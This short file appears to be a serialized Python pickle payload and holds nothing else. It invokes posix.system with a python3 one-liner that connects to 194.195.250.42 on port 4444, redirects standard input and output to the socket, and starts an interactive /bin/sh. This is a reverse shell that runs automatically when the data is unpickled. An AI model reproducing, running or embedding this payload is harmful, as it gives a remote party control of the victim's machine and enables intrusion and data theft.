cposix
system
p0
(Vpython3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('194.195.250.42',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"
p1
tp2
Rp3
.